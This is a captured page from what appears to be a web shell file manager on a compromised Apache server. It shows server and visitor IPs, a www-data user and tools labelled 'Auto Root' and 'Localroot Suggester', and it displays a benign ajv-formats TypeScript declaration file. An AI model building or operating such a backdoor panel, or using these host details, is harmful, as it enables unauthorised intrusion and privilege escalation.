Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
ajv-formats /
dist /
Delete
Unzip
Name
Size
Permission
Date
Action
formats.d.ts
643
B
-rw-r--r--
2023-12-16 08:36
formats.js
10.62
KB
-rw-r--r--
2023-12-16 08:36
formats.js.map
5.46
KB
-rw-r--r--
2023-12-16 08:36
index.d.ts
580
B
-rw-r--r--
2023-12-16 08:36
index.js
1.47
KB
-rw-r--r--
2023-12-16 08:36
index.js.map
1.5
KB
-rw-r--r--
2023-12-16 08:36
limit.d.ts
492
B
-rw-r--r--
2023-12-16 08:36
limit.js
2.83
KB
-rw-r--r--
2023-12-16 08:36
limit.js.map
2.8
KB
-rw-r--r--
2023-12-16 08:36
Save
Rename
import type { Format } from "ajv"; export declare type FormatMode = "fast" | "full"; export declare type FormatName = "date" | "time" | "date-time" | "duration" | "uri" | "uri-reference" | "uri-template" | "url" | "email" | "hostname" | "ipv4" | "ipv6" | "regex" | "uuid" | "json-pointer" | "json-pointer-uri-fragment" | "relative-json-pointer" | "byte" | "int32" | "int64" | "float" | "double" | "password" | "binary"; export declare type DefinedFormats = { [key in FormatName]: Format; }; export declare const fullFormats: DefinedFormats; export declare const fastFormats: DefinedFormats; export declare const formatNames: FormatName[];